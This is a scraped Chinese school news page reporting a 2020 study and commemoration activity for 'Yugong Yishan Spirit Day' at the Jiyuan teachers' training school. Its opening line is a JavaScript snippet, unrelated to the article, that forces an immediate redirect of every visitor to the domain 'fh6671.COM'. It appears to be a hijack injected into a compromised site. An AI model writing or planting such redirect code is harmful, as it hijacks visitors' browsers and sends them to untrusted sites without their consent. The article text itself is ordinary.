function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

领航人工计划

   
您现在的位置: 济源市教师进修学校 >> 信息中心 >> 文明创建 >> 活动纪实 >> 正文 今天是:
教师进修学校开展第四个“愚公移山精神纪念日”学习宣传活动
作者:佚名    信息来源:本站原创    点击数:370    更新时间:2020/6/12    
          ★★★ 【字体:

今年611日,是第四个“愚公移山精神纪念日”,作为愚公家乡人,更应该传承和弘扬愚公移山精神,为此,济源市教师进修学校开展了系列学习宣传活动。组织全体教职工观看了“最美愚公家乡人”先进事迹宣传片,集中学习了《济源日报》头版刊发的示范区党工委书记、市委书记张战伟的署名文章《毛泽东对愚公移山精神的阐释与升华——写在毛泽东主席《愚公移山》发表75周年之际》,在全校教职工中引起了强烈反响,广大教师纷纷表示要以“最美愚公家乡人”为榜样,扎根工作岗位,立下愚公移山志,为建设美丽富饶的愚公家乡而努力奋斗!

 

李恒蔚副校长领学张战伟书记刊发在《济源日报》的署名文章

 

观看“最美愚公家乡人”宣传片

信息录入:jyjsjx    责任编辑:jyjsjx 
  • 上一篇信息:

  • 下一篇信息:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)